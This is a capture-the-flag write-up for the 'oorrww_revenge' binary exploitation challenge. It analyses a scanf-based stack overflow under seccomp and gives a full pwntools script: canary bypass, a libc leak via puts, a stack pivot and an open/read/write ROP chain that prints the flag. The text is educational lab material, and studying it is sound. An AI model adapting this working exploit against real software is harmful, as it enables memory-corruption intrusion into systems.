This challenge is similar to oorrww challenge, with a slight difference is that we no longer have leaks, so we have to find another way.

Description

Analysis

We are presented with 64bit linux binary:

$ file oorrww_revenge  
oorrww_revenge: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ca89743989043e941c0194d  
9f5d883cda1160013, for GNU/Linux 3.2.0, not stripped

This time PIE is disabled:

$ pwn checksec --file ./oorrww_revenge  
   Arch:     amd64-64-little  
   RELRO:    Full RELRO  
   Stack:    Canary found  
   NX:       NX enabled  
   PIE:      No PIE (0x400000)

The main function seems to have been modified too, we have now a larger buffer (240 bytes) in comparison to the previous challenge (which had 176 bytes), so this means we could use a larger payload.

undefined8 main(EVP_PKEY_CTX *param_1){
  long in_FS_OFFSET;
  int i;
  undefined buffer [152];
  long canary;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  init(param_1);
  sandbox();
  gifts();
  for (i = 0; i < 0x1e; i = i + 1) {
    puts("input:");
    __isoc99_scanf(&%lf,buffer + (i << 3));
  }
  if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

And there’s no gifts :(

void gifts(void) {
  puts("oops! no more gift this time");
  return;
}

Checking seccomp, we notice that there’s no difference from the previous challenge.

$ seccomp-tools dump ./oorrww_revenge  
line  CODE  JT   JF      K  
=================================  
0000: 0x20 0x00 0x00 0x00000004  A = arch  
0001: 0x15 0x00 0x06 0xc000003e  if (A != ARCH_X86_64) goto 0008  
0002: 0x20 0x00 0x00 0x00000000  A = sys_number  
0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005  
0004: 0x15 0x00 0x03 0xffffffff  if (A != 0xffffffff) goto 0008  
0005: 0x15 0x02 0x00 0x0000003b  if (A == execve) goto 0008  
0006: 0x15 0x01 0x00 0x00000142  if (A == execveat) goto 0008  
0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW  
0008: 0x06 0x00 0x00 0x00000000  return KILL

Solution

Same thing as before, the main function reads a sequence 8 bytes from stdin in double (float) format into the buffer, but it reads more than the size of the buffer, which results in a buffer overflow vulnerability, now it reads more bytes than the previous challenge.

// this snippet is simplified
char buffer [152];
for (i = 0; i < 0x1e; i = i + 1) {
    puts("input:");
    scanf("%lf",buffer + (i << 3));
}

First we’ll setup helper functions :

def double2long(a):
    packed = struct.pack('d', a)
    unpacked = struct.unpack('q', packed)[0]
    return unpacked
 
def long2double(a):
    packed = struct.pack('q', a)
    unpacked = struct.unpack('d', packed)[0]
    return unpacked
 
def send_buffer(buffer):
    io.recvuntil(b'input:')
    io.sendline(buffer)
 
def send_address(address):
    send_buffer(f"{long2double(address)}".encode())

Lets pad the buffer, to reach the canary and RBP:

## padding
for i in range(0, 19):
    send_address(0)

We’ll now send instructions that’ll leak the address of puts function, which then we can use to calculate the libc base address, as always we’ll skip writing over the canary by sending - just like in the previous writeup, once we leak the addresses we call main function to do more exploiting.

## leak address
send_buffer(b'-') # canary
send_address(0xdeadbeff)
send_address(POP_RAX_RET)
send_address(elf.got['puts'])
send_address(MOV_EAX_RDI_PUTS)
send_buffer(b'-')
send_address(RET)
send_address(elf.symbols['main'])

We got libc base address:

## libc address
leak = u64(io.recvuntil(b'gift').split(b'\n')[1].ljust(8, b'\x00'))
libc.address = leak - libc.symbols['puts']
log.success(f"Got libc address: 0x{libc.address:x}")

As the function main has been recalled, we’ll do the padding again:

## padding
for i in range(0, 19):
    send_address(0)

We’ll have to write into a known address, unlike the previous challenge we don’t have the address of the buffer were writing into, so we’ll have to take a known writable address from the binary (remember that PIE is disabled), we’ll use this address then and setup a ROP chain to call read, and then we’ll do a stack pivot to set the new location as our stack.

send_buffer(b'-') # canary
send_address(WRITTABLE+8) # rbp
send_address(libc.address + POP_RDI_RET)
send_address(0) # stdin
send_address(libc.address + POP_RSI_RET)
send_address(WRITTABLE)
send_address(libc.address + POP_RDX_RBX_RET)
send_address(0x100)
send_address(0) # rbx
send_address(libc.symbols['read'])
send_address(LEAVE_RET) # move rbp to rsp

Now with this setup, we can use a similar payload as the previous challenge, to ORW the flag.

payload = flat([
    # store "flag.txt" in memory
    0x7478742e67616c66,
    0x0,
 
    # opening "flag.txt" in reading mode
    libc.address + MOV_RAX_2,
    libc.address + POP_RDI_RET,
    WRITTABLE,
    libc.address + POP_RSI_RET,
    0,
    libc.address + SYSCALL,
 
    # reading 0x40 bytes from "flag.txt"
    libc.address + POP_RDX_RBX_RET,
    0x40,
    0,
    libc.address + POP_RDI_RET,
    3, # we assumed that this is the file descriptor stored in rax
    libc.address + XOR_RAX,
    libc.address + POP_RSI_RET,
    WRITTABLE + 0x100,
    libc.address + SYSCALL,
 
    # writing to stdout
    libc.address + MOV_RAX_1, # write
    libc.address + POP_RDI_RET,
    0x1, # stdout
    libc.address + SYSCALL,
    ])
 
io.sendline(payload)

Running the exploit, we obtain the flag:

$ python exploit.py                      
[+] Starting local process './oorrww_revenge': pid 342681  
[+] Got libc address: 0x7b7112600000  
[+] Flag: b'L3AK{n0w_u_hav3_th3_k3y_t0_th3_inv1s1ble_ffllaagg}'  
[*] Stopped process './oorrww_revenge_patched' (pid 342681)

Full script

from pwn import *
import struct
 
def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)
 
# -------------------------------- initial configurations
gdbscript = '''
init-pwndbg
set debuginfod enabled off
'''.format(**locals())
 
exe = './oorrww_revenge'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
libc = ELF("./libc.so.6", checksec=False)
 
io = start()
 
# -------------------------------- custom functions
 
def double2long(a):
    packed = struct.pack('d', a)
    unpacked = struct.unpack('q', packed)[0]
    return unpacked
 
def long2double(a):
    packed = struct.pack('q', a)
    unpacked = struct.unpack('d', packed)[0]
    return unpacked
 
def send_buffer(buffer):
    io.recvuntil(b'input:')
    io.sendline(buffer)
 
def send_address(address):
    send_buffer(f"{long2double(address)}".encode())
 
# -------------------------------- payload
 
## gadgets in binary
POP_RAX_RET = 0x0000000000401203 # pop rax; ret;
MOV_EAX_RDI_PUTS = 0x00000000004012da # mov rdi, rax; call 0x10c0; nop; pop rbp; ret;
LEAVE_RET = 0x00000000004012c9 # leave; ret;
RET = 0x000000000040101a # ret;
 
## gadgets in libc
POP_RDI_RET = 0x000000000002a3e5 # pop rdi; ret;
POP_RSI_RET = 0x000000000002be51 # pop rsi; ret;
SYSCALL = 0x0000000000091316 # syscall; ret;
POP_RDX_RBX_RET = 0x00000000000904a9 # pop rdx; pop rbx; ret;
MOV_RAX_2 = 0x00000000000d8380 # mov rax, 2; ret;
MOV_RAX_1 = 0x00000000000d8370 # mov rax, 1; ret;
MOV_RDI_RSI_ETC = 0x00000000001a24fe # mov rdi, rsi; and eax, 0x11111111; bsr eax, eax; lea rax, [rdi + rax - 0x20]; vzeroupper; ret;
XOR_RAX = 0x00000000000baaf9 # xor rax, rax; ret;
 
 
## known writable location where the payload will be stored
WRITTABLE= 0x404000
 
# -------------------------------- run exploit
 
## padding
for i in range(0, 19):
    send_address(0)
 
## leak address
send_buffer(b'-') # canary
send_address(0xdeadbeff)
send_address(POP_RAX_RET)
send_address(elf.got['puts'])
send_address(MOV_EAX_RDI_PUTS)
send_buffer(b'-')
send_address(RET)
send_address(elf.symbols['main'])
 
## padding
for i in range(3):
    send_address(0xdeadbe00 + i)
 
## libc address
leak = u64(io.recvuntil(b'gift').split(b'\n')[1].ljust(8, b'\x00'))
libc.address = leak - libc.symbols['puts']
log.success(f"Got libc address: 0x{libc.address:x}")
 
## padding
for i in range(0, 19):
    send_address(0)
 
send_buffer(b'-') # canary
send_address(WRITTABLE+8) # rbp
send_address(libc.address + POP_RDI_RET)
send_address(0) # stdin
send_address(libc.address + POP_RSI_RET)
send_address(WRITTABLE)
send_address(libc.address + POP_RDX_RBX_RET)
send_address(0x100)
send_address(0) # rbx
send_address(libc.symbols['read'])
send_address(LEAVE_RET) # move rbp to rsp
 
sleep(1)
 
payload = flat([
    # store "flag.txt" in memory
    0x7478742e67616c66,
    0x0,
 
    # opening "flag.txt" in reading mode
    libc.address + MOV_RAX_2,
    libc.address + POP_RDI_RET,
    WRITTABLE,
    libc.address + POP_RSI_RET,
    0,
    libc.address + SYSCALL,
 
    # reading 0x40 bytes from "flag.txt"
    libc.address + POP_RDX_RBX_RET,
    0x40,
    0,
    libc.address + POP_RDI_RET,
    3, # we assumed that this is the file descriptor stored in rax
    libc.address + XOR_RAX,
    libc.address + POP_RSI_RET,
    WRITTABLE + 0x100,
    libc.address + SYSCALL,
 
    # writing to stdout
    libc.address + MOV_RAX_1, # write
    libc.address + POP_RDI_RET,
    0x1, # stdout
    libc.address + SYSCALL,
    ])
 
io.sendline(payload)
 
## getting the flag
output = io.clean().strip()
log.success(f"Flag: {output[:output.index(b'}')+1]}")